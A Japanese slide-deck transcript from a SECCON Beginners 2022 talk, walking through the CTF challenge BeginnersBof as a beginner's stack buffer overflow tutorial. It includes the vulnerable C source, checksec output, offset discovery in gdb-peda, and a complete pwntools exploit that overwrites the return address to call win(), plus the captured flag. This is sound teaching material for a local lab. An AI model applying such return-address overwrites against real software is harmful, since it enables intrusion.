Beginners Beginners Bof / SECCON Beginners Live 2022

Beginners Beginners Bof SECCON Beginners Live 2022 Reo Shiseki

自己紹介 • 紫関麗王(Shiseki Reo) • ID: n01e0 • 情報科学専門学校
4年 IPFactory • ctf4b 2022での作問 ◦ BeginnersBof 155 Solves ◦ raindrop 53 Solves ◦ snowdrop 44 Solves ◦ simplelist 32 Solves ◦ please_not_debug_me 48 Solves ◦ ultra_super_miracle_validator 40 Solves

想定読者 • Pwnableの勉強を始めたが，本番で問題が解けない • 主な担当はReversingだが，チームにPwnable担当がいないので解かざるを得ない

Pwnable問題の典型的なパターンと解法を学びテンプレとして覚えてほしい

題材 SECCON Beginners CTF 2022 BeginnersBof

問題のセットアップ $ git clone https://github.com/SECCON/Beginners_CTF_2022 $ cd Beginners_CTF_2022/pwnable/BeginnersBof $ docker-compose
up -d $ nc localhost 9000 How long your name?

Pwnable攻略の思考フロー 1. ソースコードを読み，(配布されている場合) 攻撃に転用できそうな脆弱性を探す 2. 具体的な攻撃方法を考える 3. ペイロードの組み立て 4. Flagを取得する

脆弱性を探す

ソースコード(抜粋&コメント追加) #define BUFSIZE 0x10 void win() { // この関数を呼び出せばFlagが取得できる char
buf[0x100]; int fd = open("flag.txt", O_RDONLY); if (fd == -1) err(1, "Flag file not found...\n"); write(1, buf, read(fd, buf, sizeof(buf))); close(fd); } int main() { int len = 0; char buf[BUFSIZE] = {0}; // BUFSIZEは0x10 puts("How long is your name?"); scanf("%d", &len); // バッファに読み込むデータの長さを入力 char c = getc(stdin); // 入力末尾の改行 if (c != '\n') ungetc(c, stdin); puts("What's your name?"); fgets(buf, len, stdin); // 指定された長さ分バッファに読み込む printf("Hello %s", buf); }

Pwnableで使用される代表的な脆弱性 • Stack Buffer Overﬂow • Heap Overﬂow • Format
String Attack • Use After Free • etc…

Pwnableで使用される代表的な脆弱性 • Stack Buffer Overﬂow ←今回はこれがある • Heap Overﬂow •
Format String Attack • Use After Free • etc…

Stack Buffer Overﬂow(CWE-121) スタック上に確保された領域にサイズよりも大きなデータを読み込む

Stack Buffer Overﬂowが発生する状況スタック上に確保したバッファにデータを書き込む時

gets gets関数は読み込むサイズの指定ができないので，基本的にStack Buffer Overﬂowが発生します．その為，getsを使用していた場合はコンパイラの警告が発生する程です． CTFの作問以外では使わないでください．これがあったら基本的にBuffer Overﬂowで攻撃!

scanf scanf関数でもStack Buffer Overﬂowは発生する可能性があります．例えば，char s[10]のように確保した領域に対して，scanf(“%s”, s)のような呼び出しをした場合，scanfは改行までのデータをsに書き込んでしまいます．

fgets getsとは異なり，読み込むサイズを指定できます．しかし，そのサイズを任意の値にできるような状況では Stack Buffer Overﬂowが発生してしまいます． →今回はそのパターン

ソースコード(重要な部分だけ抜粋) #define BUFSIZE 0x10 int main() { int len =
0; char buf[BUFSIZE] = {0}; // BUFSIZEは0x10 puts("How long is your name?"); scanf("%d", &len); // 0x10より大きなサイズを入力 char c = getc(stdin); if (c != '\n') ungetc(c, stdin); puts("What's your name?"); fgets(buf, len, stdin); // 確保されたサイズより大きなデータを読み込む🔥 printf("Hello %s", buf); }

セキュリティ機構の確認バイナリには脆弱性の悪用を防ぐためのセキュリティ機構が備わっている

バイナリのセキュリティ機構 • RELRO • Stack Canary • NX • PIE

RELRO RELocation Read Only メモリ上のデータに対して Read Only(書き込み不可)の属性を付与するかどうか

RELROが有効だと? GOT Overwriteができない

GOT Overwriteとは? RELROが無効，もしくはPartialで，任意のアドレスに任意の値が書き込める場合によく使われる攻撃手法

GOT Overwrite 本題から逸れる為，詳しい説明はしません GOT(Global Offset Table)とは，libcなどのリンクされたバイナリにある関数のアドレス用のキャッシュのような領域で，基本的にprintf等の呼び出しはGOTのアドレスに遷移しています．この特性を利用し，GOTにあるアドレスを，本来のlibcのアドレスから遷移させたいアドレスに変更することで，次回の呼び出し時，任
意のアドレスへ遷移します．

Stack Canary(Stack Smashing Protection) Stack Overﬂowに対するセキュリティ機構関数が呼ばれた際，スタック上にカナリア(canary)と呼ばれる値を置き，関数から戻る直前に，その値が書き換わっていないかを確認する事で，Stack
Overﬂowを検知する

Stack Canary(Stack Smashing Protection)が有効だと? Stack Buffer Overﬂowによるリターンアドレスの書き換えができない(やりづらい)

Stack Canary(Stack Smashing Protection)が有効だと Canaryはリターンアドレスよりも手前にあるため，愚直にリターンアドレスを書き換えようとすると破壊されてしまう．ほかの脆弱性を使ってCanaryをリークできれば，復元しながらリターンアドレスだけを書き換える事もできる．

NX(No Execute bit) NX(No eXecute)はメモリ上のデータ領域に置かれた値を実行できなくする為のフラグ

NXが有効だと? スタック等にシェルコードを書き込み，遷移させるような攻撃ができなくなる

PIE(Position Independent Executable) PIE(Position Independent Executable) バイナリ中のアドレス参照をすべて相対アドレスで行うフラグ

PIEが有効だと? バイナリ中のシンボルのアドレスと，実際に実行されているアドレスが異なる為，ベースとなるアドレスをリークしてからでないとシンボルの位置を特定できない．

セキュリティ機構の確認 checksecというプログラムを使う https://github.com/slimm609/checksec.sh

checksecによるセキュリティ機構の確認 $ checksec –file=chall –output=json | jq { "file": {
"relro": "no", "canary": "no", "nx": "yes", "pie": "no", "rpath": "no", "runpath": "no", "symbols": "yes", "fortify_source": "no", "fortified": "0", "fortify-able": "3" } }

脆弱性とセキュリティ機構の確認 • Stack Buffer Overﬂowがある • RELROが無効 • Canaryが無効 •
PIEが無効

脆弱性とセキュリティ機構の確認 • Stack Buffer Overﬂowがある • RELROが無効 • Canaryが無効 •
PIEが無効 • NXが無効

これらの条件から何ができるかスタック上にあるリターンアドレスの書き換え

何ができるかスタック上にあるリターンアドレスの書き換え → win関数を呼び出してFlagを取得できる

具体的な攻撃方法を考える

Stack Buffer Overﬂowの攻撃への転用今回はリターンアドレスを上書きして win関数を呼び出したい

リターンアドレスの上書きリターンアドレスはどこにある?

リターンアドレスへのオフセットを知るいくつかの方法がある • ツールによるdisassemble結果を見る • デバッガで探る

gdb-peda gdb(デバッガ)の拡張 https://github.com/longld/peda デバッグ/Pwnに便利な機能が追加されている • わかりやすいレジスタ/コード/スタックの表示 • etc…

インストール $ git clone https://github.com/longld/peda.git ~/peda $ echo “source ~/peda/peda.py
>> ~/.gdbinit

pedaによる解析(メイン画面) main関数にbreakpointを設置実行した結果 gdb-peda$ b *main gdb-peda$ run

pedaによる解析(disassemble) main関数のdisassemble結果 BOFが発生するのは 0x00000000004012f2の call 0x401090 <fgets@plt> gdb-peda$ disas main

pedaによる解析(BOFの確認) 1. sizeは適当に51で指定 2. ‘a’を50個+改行入力した結果 gdb-peda$ c Continuing. How
long is your name? 51 What's your name? aaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaa

pedaによる解析(BOFの確認) SIGSEGVによる停止

pedaによる解析(リターンアドレスの確認) mainが呼び出された時の stack topがリターンアドレス 0x7fffffffce98 --> 0x7ffff7d8fd90

pedaによる解析(リターンアドレスの確認) SEGVが発生した時点では? “aaaaaaaa”に書き換わっているリターンアドレスまでのオフセットは?

pedaによる解析(オフセットの特定) pattern_createコマンドオフセットの特定に便利指定した長さの文字列を作り出してくれる gdb-peda$ pattern_create 50

pedaによる解析(オフセットの特定) pattoコマンドでオフセットを確認できる RSPの”AA0AAFAAbA” へのオフセットは40bytes gdb-peda$ r gdb-peda$ c Continuing.
How long is your name? 51 What's your name? AAA%AAsAABAA$AAnAACAA-AA(A ADAA;AA)AAEAAaAA0AAFAAbA gdb-peda$ patto AA0AAFAAbA AA0AAFAAbA found at offset: 40

具体的な攻撃方法

攻撃方法リターンアドレスは入力の先頭から 40bytes先にある ↓ 40bytesのデータ+遷移させたいアドレスを入力すれば良い

Exploitの組み立て

Exploitの組み立て脆弱な部分はわかったリターンアドレスまでのオフセットもわかった具体的な攻撃方法もわかったあとはやるだけ → 退屈なことはPythonにやらせる

pwntools

pwntools exploitの作成に便利なPythonのライブラリ (https://github.com/Gallopsled/pwntools) • リモートで動いているプログラムへの接続 • バイナリの解析 • etc… 非常に多機能(使い切れないくらい)
参考: https://qiita.com/8ayac/items/12a3523394080e56ad5a

install $ python3 -m pip install -upgrade pwntools

今回使う機能 • バイナリの解析 • リモートへの接続 • データのpack • データの入出力

バイナリの解析 ELFを解析してくれる関数バイナリ中の関数のアドレス等が取得できるようになる context.binaryに対象のバイナリを指定する事で，今後のpack等をいい感じにしてくれる from pwn import
* e = ELF("./chall") context.binary = "./chall"

データのpack 実際に送信するpayloadを作成する 40bytesの適当なデータと遷移させたいwin関数のアドレス e.sym[]で解析したバイナリのシンボルを取得し pack()でいい感じにバイト列にする from pwn import
* e = ELF("./chall") context.binary = "./chall" payload = b'a' * 40 payload += pack(e.sym["win"])

リモートへの接続 pwnの問題はリモートで動いているプログラムに接続する事がほとんど remoteで接続先を指定する事で，全部いい感じにしてくれる戻り値は今後の入出力に使用する from pwn import *
e = ELF("./chall") context.binary = "./chall" payload = b'a' * 40 payload += pack(e.sym["win"]) io = remote("localhost", 9000)

データの入出力 sendlineafterは第1引数に指定したバイト列を受け取った後第2引数のバイト列を改行と共に送信するメソッド今回はpayloadの長さを文字列にした後，バイト列に変換して送信する from pwn import
* e = ELF("./chall") context.binary = "./chall" payload = b'a' * 40 payload += pack(e.sym["win"]) io = remote("localhost", 9000) io.sendlineafter( b"How long is your name?", str(len(payload)).encode() )

ﬂagの取得改行はいらないのでsendafterで送信後はﬂagが出力されるはずなのでいい感じに受け取ってprintする from pwn import * e =
ELF("./chall") context.binary = "./chall" payload = b'a' * 40 payload += pack(e.sym["win"]) io = remote("localhost", 9000) io.sendlineafter(b"How long is your name?", str(len(payload)).encode()) io.sendafter( b"What's your name?", payload ) io.recvuntil(b"ctf4b{") print( "ctf4b{" + io.readline().decode(), end='' )

Exploit! $ ls chall exploit.py $ python3 ./exploit.py [*] '/home/lilium/src/github.com/SECCON/Beginners_CTF_2022/pwnable/BeginnersBof/exploit/chall'
Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to localhost on port 9000: Done ctf4b{Y0u_4r3_4lr34dy_4_BOF_M45t3r!} [*] Closed connection to localhost port 9000

以上! ctf4b{Y0u_4r3_4lr34dy_4_BOF_M45t3r!}

問題の停止 $ docker-compose down

確認 ➔ 脆弱性の調査 ➔ Stack Buffer Overﬂowがあり，canaryが無効 ➔ リターンアドレスへのオフセットを調査 ➔
padding+遷移させたいアドレスを送信 ➔ Flag Get?

Beginners Beginners Bof / SECCON Beginners Live...

Beginners Beginners Bof / SECCON Beginners Live 2022

More Decks by n01e0

Other Decks in Technology

Featured

Transcript